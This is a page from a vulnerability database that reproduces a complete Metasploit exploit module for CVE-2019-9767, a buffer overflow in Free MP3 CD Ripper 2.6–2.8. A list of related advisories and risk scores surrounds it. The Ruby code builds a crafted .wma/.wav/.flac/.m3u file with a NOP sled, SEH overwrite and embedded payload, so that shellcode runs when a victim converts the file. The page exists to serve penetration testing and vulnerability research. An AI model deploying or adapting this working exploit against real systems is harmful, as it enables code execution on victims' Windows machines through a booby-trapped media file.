Vulners
Lucene search
Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow Exploit | 20 Nov 202000:00 | – | zdt |
 | CVE-2019-9767 | 14 Sep 201800:00 | – | circl |
 | Free MP3 CD Ripper Buffer Overflow Vulnerability (CNVD-2019-07811) | 18 Mar 201900:00 | – | cnvd |
 | CVE-2019-9767 | 14 Mar 201907:00 | – | cve |
 | CVE-2019-9767 | 14 Mar 201907:00 | – | cvelist |
 | EUVD-2019-19129 | 7 Oct 202500:30 | – | euvd |
 | CVE-2019-9767 | 14 Mar 201909:29 | – | nvd |
 | CVE-2019-9767 | 14 Mar 201909:29 | – | osv |
 | Free MP3 CD Ripper 2.8 Buffer Overflow | 20 Nov 202000:00 | – | packetstorm |
 | Stack overflow | 14 Mar 201909:29 | – | prion |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gionathan Reale', # Exploit-DB POC
'ZwX' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2019-9767' ],
[ 'EDB', '45412' ],
[ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 x86 - Windows 7 x64',
{
'Ret' => 0x66e42121 # POP POP RET
}
]
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x2f"
},
'Privileged' => false,
'DisclosureDate' => "Sep 09 2018",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
])
end
def exploit
file_payload = payload.encoded
msfsploit = make_fast_nops(4116)
msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
msfsploit << [target.ret].pack("V*") # SEH
msfsploit << file_payload
msfsploit << make_fast_nops(4440)
file_create(msfsploit)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Nov 2020 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
CVSS 37.8
EPSS0.07991